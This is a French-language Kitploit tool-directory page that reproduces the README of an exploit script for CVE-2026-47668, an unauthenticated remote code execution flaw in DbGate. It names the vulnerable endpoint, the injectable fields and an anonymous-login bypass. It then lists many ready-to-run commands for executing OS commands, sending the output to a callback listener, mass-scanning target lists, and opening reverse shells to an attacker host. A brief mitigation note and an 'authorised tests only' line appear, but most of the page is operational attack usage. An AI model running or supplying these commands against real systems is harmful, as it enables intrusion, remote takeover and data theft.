Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-47668 — Exécution de code à distance non authentifiée DbGate | Kitploit
Outils/GitHubGitHub/nxploited/cve-2026-47668
Scanners de VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleRed TeamingOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubnxploited/cve-2026-47668

CVE-2026-47668

Exécution de code à distance non authentifiée DbGate

Voir le dépôt
613il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-47668 — Exécution de code à distance DbGate

RCE non authentifié dans le DbGate JSON Script Runner (dbgate-serve ≤ 7.1.8).
Outil d'évaluation : CVE-2026-47668.py — tests autorisés uniquement.

CVECVE-2026-47668
SeveritéCritique
ProduitDbGate / dbgate-serve
Affecté≤ 7.1.8
Corrigé≥ 7.1.9
CVSS 3.1AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CWECWE-20, CWE-94, CWE-1188

Vulnérabilité

Titre : Exécution de code à distance non authentifiée DbGate via JSON Script Runner

Les champs contrôlés par l'utilisateur (functionName, variableName) sont intégrés dans du JavaScript généré dynamiquement sans validation appropriée. Un attaquant peut exécuter du code arbitraire dans le processus enfant du runner Node.js.

ÉlémentDétail
Point d'accèsPOST /runners/start
AuthentificationJeton Bearer requis ; le jeton peut être obtenu via POST /auth/login sur les déploiements anonymes/par défaut
InjectionfunctionName, variableName dans les commandes JSON assign
ImpactExécution de commandes OS en tant qu'utilisateur du processus DbGate

Atténuation : Mettez à jour vers 7.1.9+. Restreignez l'accès réseau, désactivez l'authentification anonyme, renouvelez les identifiants, examinez les journaux pour toute activité suspecte sur /runners/start.


Contact

Telegram : @KNxploited


Aperçu de l'outil

CVE-2026-47668.py vérifie et valide l'exploitation contre les instances DbGate que vous êtes autorisé à tester.

Modes

ModeShell inverséDescription
AUTONonUne invite ; jeton + callback HTTP + valeurs par défaut
CLIOptionnelContrôle total via les drapeaux
MassNonAnalyse depuis targets.txt
--reverse-shellOuiVérification TCP optionnelle (cible unique uniquement)

Résultats

RésultatSignification
FAILInaccessible, échec d'authentification ou non vulnérable
VULNRunner a accepté la sonde uniquement
DISPATCHCharge utile envoyée ; aucune sortie confirmée
EXFILCallback reçu — sortie de commande confirmée
REVSHTCP inversé connecté (mode optionnel uniquement)

Répertoire de sortie : Nx/ (vuln, dispatch, exfil, failed, list_report, fichiers par cible sous exfil/)


Installation

pip install -r requirements.txt

Nécessite : Python 3.9+, aiohttp, colorama


Utilisation

Assistant AUTO (par défaut — pas de shell inversé)

python CVE-2026-47668.py
Entrée à l'inviteExemple
URL uniquehttp://192.168.1.10:3000
URL + commande`http://192.168.1.10:3000
Liste de ciblestargets.txt

CLI — activer le drapeau

Chaque exécution CLI doit inclure --cli.

python CVE-2026-47668.py --cli [options]

Cible unique

-u / --url — URL de base de la cible

python CVE-2026-47668.py --cli -u http://192.168.1.10:3000

--cmd / --command — commande shell (par défaut : id)

python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --cmd "id"
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --cmd "uname -a"
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --cmd "ls -la /tmp"

--check-only — sonde de vulnérabilité uniquement (pas de commande)

python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --check-only

--vector — vecteur d'injection : functionName | variableName | both

python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --vector both --cmd id

--port — port par défaut lorsque l'URL n'a pas de port (par défaut : 3000)

python CVE-2026-47668.py --cli -u http://192.168.1.10 --port 3000 --cmd id

--token — utiliser un jeton Bearer existant

python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --token "eyJhbGciOi..." --cmd id

--login-json — corps de connexion personnalisé (par défaut : {"amoid":"none"})

python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --login-json "{\"amoid\":\"none\"}" --cmd id

--timeout — délai d'attente HTTP en secondes

python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --timeout 20 --cmd id

--secure — vérifier les certificats TLS

python CVE-2026-47668.py --cli -u https://dbgate.example.com:3000 --secure --cmd id

Callback / exfil (activé par défaut en CLI avec --cmd)

--callback-host — IP/nom d'hôte que la cible utilise pour atteindre votre écouteur

python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --callback-host 192.168.1.5 --cmd id

--listen-host — liaison locale pour l'écouteur HTTP (par défaut : 0.0.0.0)

python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --listen-host 0.0.0.0 --cmd id

--listen-port — port d'exfil HTTP (par défaut : 8888)

python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --listen-port 8888 --cmd id

-c / --callback — URL de callback externe (désactive l'écouteur intégré)

python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 -c http://192.168.1.5:9999/ --cmd id

--wait-exfil — secondes d'attente pour le callback (cible unique, par défaut : 8)

python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --wait-exfil 15 --cmd id

--no-b64 — envoyer la sortie sans encodage base64

python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --no-b64 --cmd id

--async-exec — exec asynchrone au lieu de execSync

python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --async-exec --cmd id

Analyse de masse (pas de shell inversé)

-f / --file — fichier de liste de cibles

python CVE-2026-47668.py --cli -f targets.txt --cmd id

-t / --threads — workers concurrents (par défaut : 30)

python CVE-2026-47668.py --cli -f targets.txt --cmd id -t 50

--mass-wait-exfil — attente de callback par cible en mode masse (par défaut : 8)

python CVE-2026-47668.py --cli -f targets.txt --cmd id --mass-wait-exfil 12

Masse + port par défaut personnalisé

python CVE-2026-47668.py --cli -f targets.txt --port 3000 --cmd "id"

Shell inversé (optionnel — cible unique uniquement)

Non requis pour les tests normaux. Utilisez HTTP exfil (--cmd) comme preuve.

--reverse-shell — la cible se connecte à LHOST:LPORT (omettre la valeur = IP LAN + port 4444)

python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444

--revsh-port — port lorsque --reverse-shell n'a pas de :port

python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5 --revsh-port 4444

--revsh-bind — adresse d'écoute locale

python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444 --revsh-bind 0.0.0.0

--wait-revsh — attente TCP (par défaut : 15)

python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444 --wait-revsh 20

--revsh-interactive — relais stdin/stdout de base après connexion

python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444 --revsh-interactive
Télécharger l’outil